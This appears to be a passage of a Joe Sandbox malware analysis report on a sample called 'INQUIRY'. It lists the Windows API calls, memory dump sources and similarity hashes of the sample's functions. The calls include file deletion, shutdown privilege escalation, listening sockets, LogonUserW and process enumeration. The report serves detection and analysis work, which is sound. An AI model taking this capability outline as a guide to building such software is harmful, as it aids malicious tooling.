  • Part of subcall function 00A74A31: GetFileAttributesW.KERNEL32(?,00A7370B), ref: 00A74A32
• FindFirstFileW.KERNEL32(?,?), ref: 00A738A3
• DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00A7394B
• MoveFileW.KERNEL32(?,?), ref: 00A7395E
• DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00A7397B
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00A7399D
• FindClose.KERNEL32(00000000,?,?,?,?), ref: 00A739B9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
• String ID: \*.*
• API String ID: 4002782344-1173974218
• Opcode ID: 5722b509cc4e5cf0f0fdbe8217f631ed0603453979c62dc4236eceea78434038
• Instruction ID: 31308b50083fc140f9c2fbbb92d84fd9aa075c5fa1e7392c1fc668b7d07ada72
• Opcode Fuzzy Hash: 5722b509cc4e5cf0f0fdbe8217f631ed0603453979c62dc4236eceea78434038
• Instruction Fuzzy Hash: 95515C3290514CAACF05EBA0DEA2DFDB779AF14300F608169E40AB7191EF316F49DB61
APIs
  • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
• FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00A7F440
• Sleep.KERNEL32(0000000A), ref: 00A7F470
• _wcscmp.LIBCMT ref: 00A7F484
• _wcscmp.LIBCMT ref: 00A7F49F
• FindNextFileW.KERNEL32(?,?), ref: 00A7F53D
• FindClose.KERNEL32(00000000), ref: 00A7F553
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
• String ID: *.*
• API String ID: 713712311-438819550
• Opcode ID: 4d1dbdddd98cefbeeb9e034706db06624531dff5ef7ba629a95a78a6498521bb
• Instruction ID: 521a8498e018c24143443b73905b0c3ab0df1ecf73efb89eca019597612f4e8e
• Opcode Fuzzy Hash: 4d1dbdddd98cefbeeb9e034706db06624531dff5ef7ba629a95a78a6498521bb
• Instruction Fuzzy Hash: 7F416C7194421AAFCF14DFA4DC45AEEBBB8FF05314F148466E819A7191EB309B85CF90
APIs
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
• Opcode ID: 6525a3ba35e342d890a34534e84c7bd800b6bc03e5c1a8d39a0babd31511a6cb
• Instruction ID: 1f9d75e814e00fed25ef5674aaa517eacb85130d3087b5b290e2d9af4cba4384
• Opcode Fuzzy Hash: 6525a3ba35e342d890a34534e84c7bd800b6bc03e5c1a8d39a0babd31511a6cb
• Instruction Fuzzy Hash: 0E127970E00619DFDF14DFA9DA81AEEB7F5FF48300F204569E846A7250EB36A991CB50
APIs
  • Part of subcall function 00A14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A14743,?,?,00A137AE,?), ref: 00A14770
  • Part of subcall function 00A74A31: GetFileAttributesW.KERNEL32(?,00A7370B), ref: 00A74A32
• FindFirstFileW.KERNEL32(?,?), ref: 00A73B89
• DeleteFileW.KERNEL32(?,?,?,?), ref: 00A73BD9
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00A73BEA
• FindClose.KERNEL32(00000000), ref: 00A73C01
• FindClose.KERNEL32(00000000), ref: 00A73C0A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
• String ID: \*.*
• API String ID: 2649000838-1173974218
• Opcode ID: 4abacd5052acad7e6d41c2a9f10649e42517ca81ea126e769be0c29f0eacc064
• Instruction ID: f16e6f7c4097f2c350d371e3751073257d6539bd2e2bd295484b8da14d94e9cd
• Opcode Fuzzy Hash: 4abacd5052acad7e6d41c2a9f10649e42517ca81ea126e769be0c29f0eacc064
• Instruction Fuzzy Hash: 4D316F320083859FC601EB64CD918EFB7E8AE95314F448D2DF4E992191EB259A09D753
APIs
  • Part of subcall function 00A687E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A6882B
  • Part of subcall function 00A687E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A68858
  • Part of subcall function 00A687E1: GetLastError.KERNEL32 ref: 00A68865
• ExitWindowsEx.USER32(?,00000000), ref: 00A751F9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $@$SeShutdownPrivilege
• API String ID: 2234035333-194228
• Opcode ID: bf940fcb41fa7f41392075ac23ed2470e4661807a771e19127f8b870f926e6e0
• Instruction ID: 575cfb65f398f4482ca383a356e1482e7d6535f22284a3b49d1551784460ec71
• Opcode Fuzzy Hash: bf940fcb41fa7f41392075ac23ed2470e4661807a771e19127f8b870f926e6e0
• Instruction Fuzzy Hash: 3D01D431F916116BE72863789C8AFFA72ACAB05341F21C525F90BE20D3E9A11C0185D4
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00A862DC
• WSAGetLastError.WSOCK32(00000000), ref: 00A862EB
• bind.WSOCK32(00000000,?,00000010), ref: 00A86307
• listen.WSOCK32(00000000,00000005), ref: 00A86316
• WSAGetLastError.WSOCK32(00000000), ref: 00A86330
• closesocket.WSOCK32(00000000,00000000), ref: 00A86344
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: ErrorLast$bindclosesocketlistensocket
• String ID:
• API String ID: 1279440585-0
• Opcode ID: ec21559d94e7aa13b3797d1c71b2fcb60e3a7ca47a6ce3f24492f01eb46d0c9d
• Instruction ID: d09b6c1cdfadfc33b3134c7d8c3b77d7c97963ac52734808d7a638a05a115211
• Opcode Fuzzy Hash: ec21559d94e7aa13b3797d1c71b2fcb60e3a7ca47a6ce3f24492f01eb46d0c9d
• Instruction Fuzzy Hash: 6521AD316002049FDB10EFA4C949BAEB7B9EF49720F248169E916EB391CB70AD42CB51
APIs
  • Part of subcall function 00A30DB6: std::exception::exception.LIBCMT ref: 00A30DEC
  • Part of subcall function 00A30DB6: __CxxThrowException@8.LIBCMT ref: 00A30E01
• _memmove.LIBCMT ref: 00A60258
• _memmove.LIBCMT ref: 00A6036D
• _memmove.LIBCMT ref: 00A60414
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: _memmove$Exception@8Throwstd::exception::exception
• String ID:
• API String ID: 1300846289-0
• Opcode ID: d18a3aa572f2c278aaf1ddd21e58eb3c23a6303b27a07e669be5434c77d5c4f0
• Instruction ID: 33b162c9c5c22a7886465d79d6d1065a550bcf613b14e1e24892f9e26ba22f88
• Opcode Fuzzy Hash: d18a3aa572f2c278aaf1ddd21e58eb3c23a6303b27a07e669be5434c77d5c4f0
• Instruction Fuzzy Hash: 82029DB0E00219DFCF04DF68DA91AAEBBB5FF44300F148469E80ADB255EB35D995CB91
APIs
  • Part of subcall function 00A12612: GetWindowLongW.USER32(?,000000EB), ref: 00A12623
• DefDlgProcW.USER32(?,?,?,?,?), ref: 00A119FA
• GetSysColor.USER32(0000000F), ref: 00A11A4E
• SetBkColor.GDI32(?,00000000), ref: 00A11A61
  • Part of subcall function 00A11290: DefDlgProcW.USER32(?,00000020,?), ref: 00A112D8
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: ColorProc$LongWindow
• String ID:
• API String ID: 3744519093-0
• Opcode ID: 2419f0b52502cccdb23453e65d590a60a777665b527dbf79cddedcc7294deeb2
• Instruction ID: 8eee8c970c826053f35baa3f6c79c9b237984ae25b926b6b121ecc8f2592296e
• Opcode Fuzzy Hash: 2419f0b52502cccdb23453e65d590a60a777665b527dbf79cddedcc7294deeb2
• Instruction Fuzzy Hash: A7A15A79216944BEEB28AB385D44EFF3DADDF813C1B24051AF712D5192CB24DD8192F1
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00A7BCE6
• _wcscmp.LIBCMT ref: 00A7BD16
• _wcscmp.LIBCMT ref: 00A7BD2B
• FindNextFileW.KERNEL32(00000000,?), ref: 00A7BD3C
• FindClose.KERNEL32(00000000,00000001,00000000), ref: 00A7BD6C
Similarity
• API ID: Find$File_wcscmp$CloseFirstNext
• String ID:
• API String ID: 2387731787-0
• Opcode ID: 7d83ab8b2e29326fdd85d1b26a29373d20d98604f62f2f9107741f11e6929df3
• Instruction ID: 719ba28e853f6d761e980ce76f83e2a01f0a7064e2e7911e371d264c9f381e5e
• Opcode Fuzzy Hash: 7d83ab8b2e29326fdd85d1b26a29373d20d98604f62f2f9107741f11e6929df3
• Instruction Fuzzy Hash: 095190756046019FD724DF68C891E9AB3E4FF49320F14851DF95A873A2DB30ED05CBA1
APIs
  • Part of subcall function 00A87D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00A87DB6
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00A8679E
• WSAGetLastError.WSOCK32(00000000), ref: 00A867C7
• bind.WSOCK32(00000000,?,00000010), ref: 00A86800
• WSAGetLastError.WSOCK32(00000000), ref: 00A8680D
• closesocket.WSOCK32(00000000,00000000), ref: 00A86821
Similarity
• API ID: ErrorLast$bindclosesocketinet_addrsocket
• String ID:
• API String ID: 99427753-0
• Opcode ID: 9a4bf109d3eacf19d32f605e4bdf398f321067974afd258d23a12f746a6fc68b
• Instruction ID: 664356d47171706129bb7e5afc5b83269d7e8c09e86fb3d4618bd95b35cecac6
• Opcode Fuzzy Hash: 9a4bf109d3eacf19d32f605e4bdf398f321067974afd258d23a12f746a6fc68b
• Instruction Fuzzy Hash: 5641D175B00210AFEB10BF648D96FBE77A8DF09B54F048458F91AAB3C2CA749D41CB91
APIs
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
• Opcode ID: f4c752fea4262467047863064a4ea9d47e95c34fc0a3ffdaa4cec662ab7069ac
• Instruction ID: f60e70393b8b2d158749bbcfd0bc2c1ed27cc504b554b7a1eb113cf60a4c604c
• Opcode Fuzzy Hash: f4c752fea4262467047863064a4ea9d47e95c34fc0a3ffdaa4cec662ab7069ac
• Instruction Fuzzy Hash: 6911B231B009116FEF225F769C55AAB7BE9EF857A1B514029F846D7241CBB0DC42CBA0
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A680C0
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A680CA
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A680D9
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A680E0
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A680F6
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
• Opcode ID: 4196606c78238db0e544bf454a5fedcb4d32956f6dfd9b5f3487651f63a68ad1
• Instruction ID: 7f60fe88729c263927195b1a6fbc65904156c96acfc81cfac8f752ace66f742e
• Opcode Fuzzy Hash: 4196606c78238db0e544bf454a5fedcb4d32956f6dfd9b5f3487651f63a68ad1
• Instruction Fuzzy Hash: 87F04F31340204AFEB104FA5EC8DE6B3BACEF4A755B100226F955C6150DE659C43DA60
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00A14AD0), ref: 00A14B45
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00A14B57
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetNativeSystemInfo$kernel32.dll
• API String ID: 2574300362-192647395
• Opcode ID: 979a64eaf9692d02a6e1fc3388ccc36bf1ba5133ee31150a3869f5eb727dd913
• Instruction ID: 36912b23429e82be27180aebb4e3a561428be766b2d6796db92f18451a5b3337
• Opcode Fuzzy Hash: 979a64eaf9692d02a6e1fc3388ccc36bf1ba5133ee31150a3869f5eb727dd913
• Instruction Fuzzy Hash: 19D01274B14713DFDB20DF75E858B4676E4AF05351B25CC3A9485D6150DA70D4C0C654
Similarity
• API ID: __itow__swprintf
• String ID:
• API String ID: 674341424-0
• Opcode ID: 390f8d0cb7066ab1cc95d1d11968bbbc9112019acb2c8abc21fbe0248120fb5e
• Instruction ID: d3d2dca6d90a4ae9e62366634c0c757cef771713f9b2cf64a78b99544045833c
• Opcode Fuzzy Hash: 390f8d0cb7066ab1cc95d1d11968bbbc9112019acb2c8abc21fbe0248120fb5e
• Instruction Fuzzy Hash: B1229D726083109FCB24DF18D991BABB7F4BF85310F50492DF89697291DB34E948CB92
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00A8EE3D
• Process32FirstW.KERNEL32(00000000,?), ref: 00A8EE4B
  • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
• Process32NextW.KERNEL32(00000000,?), ref: 00A8EF0B
• CloseHandle.KERNEL32(00000000,?,?,?), ref: 00A8EF1A
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
• String ID:
• API String ID: 2576544623-0
• Opcode ID: 8425398ed9d8be734d391e186a2e7e0d05dcede01081ccbfecdfbf89183598f5
• Instruction ID: 613079677e60e9c50e139a0489c321523d584749c94733985b61dee3682f8070
• Opcode Fuzzy Hash: 8425398ed9d8be734d391e186a2e7e0d05dcede01081ccbfecdfbf89183598f5
• Instruction Fuzzy Hash: 5651AC71508311AFD310EF24DC85EABB7E8EF98750F10482DF995972A1EB30E949CB92
Similarity
• API ID: BuffCharUpper
• String ID:
• API String ID: 3964851224-0
• Opcode ID: c2f68756813e939ddd438f98716ce88168c5735b318f97c0702d70792ca9e28c
• Instruction ID: a389f2b91debd65d8a910e926f25dcd90648340dc5a3ff116cc1febf81b237c9
• Opcode Fuzzy Hash: c2f68756813e939ddd438f98716ce88168c5735b318f97c0702d70792ca9e28c
• Instruction Fuzzy Hash: 2D926B706083518FD720DF18D580B6ABBF5BF89304F14896DE89A8B362D775EC85CB92
APIs
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 00A6E628
Strings
Similarity
• API ID: lstrlen
• String ID: ($|
• API String ID: 1659193697-1631851259
• Opcode ID: ba2cfea7f5eab1d1f4d55052558bb8ab010682a4f3cc813a533304e2a14104c1
• Instruction ID: 73e61e6bd149563d78884f8813cdce023d2e0ca6839f3240e40bd71b1704c925
• Opcode Fuzzy Hash: ba2cfea7f5eab1d1f4d55052558bb8ab010682a4f3cc813a533304e2a14104c1
• Instruction Fuzzy Hash: 7D322579A007059FDB28CF59C481A6AB7F1FF48320B15C56EE89ADB3A1E770E941CB44
APIs
• InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00A8180A,00000000), ref: 00A823E1
• InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00A82418
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: Internet$AvailableDataFileQueryRead
• String ID:
• API String ID: 599397726-0
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00A7B40B
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00A7B465
• SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00A7B4B2
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID:
• API String ID: 1682464887-0
APIs
  • Part of subcall function 00A30DB6: std::exception::exception.LIBCMT ref: 00A30DEC
  • Part of subcall function 00A30DB6: __CxxThrowException@8.LIBCMT ref: 00A30E01
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A6882B
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A68858
• GetLastError.KERNEL32 ref: 00A68865
Similarity
• API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
• String ID:
• API String ID: 1922334811-0
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00A68774
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00A6878B
• FreeSid.ADVAPI32(?), ref: 00A6879B
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00A7C6FB
• FindClose.KERNEL32(00000000), ref: 00A7C72B
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00A89468,?,00A9FB84,?), ref: 00A7A097
• FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00A89468,?,00A9FB84,?), ref: 00A7A0A9
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A68309), ref: 00A681E0
• CloseHandle.KERNEL32(?,?,00A68309), ref: 00A681F2
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,00A38D57,?,?,?,00000001), ref: 00A3A15A
• UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00A3A163
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
                                                                                              APIs
                                                                                              • __time64.LIBCMT ref: 00A7889B
                                                                                                • Part of subcall function 00A3520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00A78F6E,00000000,?,?,?,?,00A7911F,00000000,?), ref: 00A35213
                                                                                                • Part of subcall function 00A3520A: __aulldiv.LIBCMT ref: 00A35233
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$FileSystem__aulldiv__time64
                                                                                              • String ID:
                                                                                              • API String ID: 2893107130-0
                                                                                              • Opcode ID: 10baac5489c30f6bfc6d65139e5c76c28b1a4b6334f2735a09138985df2ec8e6
                                                                                              • Instruction ID: 5a9ca9b235abaaf7b717e12c4e2761b9381fdc340d2872c878d9275b5a1e977c
                                                                                              • Opcode Fuzzy Hash: 10baac5489c30f6bfc6d65139e5c76c28b1a4b6334f2735a09138985df2ec8e6
                                                                                              • Instruction Fuzzy Hash: 1821A2326255108BC729CF69D841A52B3E1EBA5311B688E6DE0FACB2C0CA34A945CB54
                                                                                              APIs
                                                                                              • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00A74C4A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: mouse_event
                                                                                              • String ID:
                                                                                              • API String ID: 2434400541-0
                                                                                              • Opcode ID: 95b3df02212e5d8de6b9a2102770c80b5c9912880ac8dd25d621c074d3f1ecb4
                                                                                              • Instruction ID: deb4bd23261049868c3eb87955273dec5b236d06465be1150a2637b0c2a3a04a
                                                                                              • Opcode Fuzzy Hash: 95b3df02212e5d8de6b9a2102770c80b5c9912880ac8dd25d621c074d3f1ecb4
                                                                                              • Instruction Fuzzy Hash: E4D05EA116520978FC1D07649E1FF7B0508E348782FD0C1497109CA0C1EF905C405032
                                                                                              APIs
                                                                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00A68389), ref: 00A687D1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: LogonUser
                                                                                              • String ID:
                                                                                              • API String ID: 1244722697-0
                                                                                              • Opcode ID: b4ea772b386621f83c53a9498ec8f9011e51f44f2bb53ff4b0984b8f2280eb60
                                                                                              • Instruction ID: 563008ad0b145b003a5dc6e6c5f03d22ce16a2e285dbf2cc741bd4c6d794d09e
                                                                                              • Opcode Fuzzy Hash: b4ea772b386621f83c53a9498ec8f9011e51f44f2bb53ff4b0984b8f2280eb60
                                                                                              • Instruction Fuzzy Hash: 00D05E3226450EAFEF018EA4DC01EAE3B69EB04B01F408111FE15C50A1C775D835AB60
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00A3A12A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: e711638fcf1f793c1a172b3ef6dd127f3b3c62f362a649f9c5d58c168b43f650
